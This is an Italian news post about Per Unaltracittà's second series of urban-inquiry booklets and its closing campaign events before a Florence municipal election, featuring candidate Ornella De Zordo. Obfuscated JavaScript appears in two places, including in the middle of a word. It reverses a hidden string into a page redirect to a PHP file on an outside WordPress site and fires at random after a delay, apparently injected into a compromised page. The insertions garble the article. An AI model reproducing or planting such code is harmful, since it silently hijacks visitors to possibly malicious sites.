I nuovi Quaderni. De Zordo: "Si ai contenuti, basta con il politicismo"

image_pdfimage_print

Dopo il gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande successo della prima serie – oltre 9.000 quaderni venduti -,

E’ in questo modo che Ornella De Zordo richiama l’attenzione sui temi veri della città: “Il lancio di questa seconda serie di Quaderni di inchiesta urbana – sottolinea – arriva a pochi giorni dalle elezioni perché vogliamo riportare l’attenzione del dibattito sui temi caldi, i problemi quotidiani di Firenze. Mentre anche a sinistra si discute di accordi e spartizioni, noi vogliamo contrastare questo vecchio modo di fare politica, continuando a lavorare come abbiamo fatto in questi anni di opposizione in Consiglio Comunale. Vogliamo far conoscere ad un pubblico più ampio possibile, partendo dalla critica alle azioni messe in pratica dall’amministrazione in questi ultimi dieci anni, le tante proposte innovative che abbiamo per questa città”.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2009/06/cover.jpg”>I Quaderni di Inchiesta Urbana
I Quaderni di Inchiesta Urbana

La seconda serie di “Quaderni di inchiesta urbana” offre uno strumento sulla realtà politico-culturale di Firenze e rappresenta per questo uno spunto di lettura importante alla vigilia del voto amministrativo. A scrivere sono esperti e attivisti che da anni studiano e praticano le emergenze cittadine e i temi proposti: Firenze auto-critica – di Maurizio Da Re, La corte di San Lorenzo – di Cristian De Vito, Disastro Tav – di Maurizio De Zordo, Dimmi chi escludi e ti dirò chi sei – di Lorenzo Guadagnucci, Oltre la crisi – di Lorenzo Guadagnucci, La biocittà e la comunità urbana – di Giorgio Pizziolo, Case (im)popolari – di Duccio Tronci, Ammalarsi a Firenze – a cura del gruppo salute di Per Unaltracittà. “Le nostre idee per Firenze” è il titolo del nono libretto, tutto improntato sulle idee di Per Unaltracittà per la città.

I nove libretti saranno già da oggi a disposizione presso la sede del comitato elettorale (Firenze – Borgo Pinti, 50 rosso) e in distribuzione alle iniziative di chiusura di campagna elettorale organizzate in questi giorni da Per Unaltracittà:
– mercoledì 3 giugno
alle ore 17.30 sotto la Loggia del pesce in piazza dei CiompiEccoci all’acqua”, per costruire a Firenze, da subito, il nuovo modello di gestione pubblica e partecipata del servizio idrico. Intervengono, fra gli altri: Marco Bersani – Attac Italia, Luciano D’Antonio – Forum Toscano dei Movimenti per l’Acqua.
– giovedì 4 giugno dalle ore 20 in Piazza Santo Spirito la Festa di chiusura della campagna elettorale: con cibo per tutti, allegria, tanta musica e non solo. Buffet a cura di Zenzero (offerta libera). Intervengono: Ornella De Zordo – candidata Sindaco di Firenze, Claudia Agati – candidata Presidente della Provincia di Firenze.

[Fonte Per Unaltracittà]

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *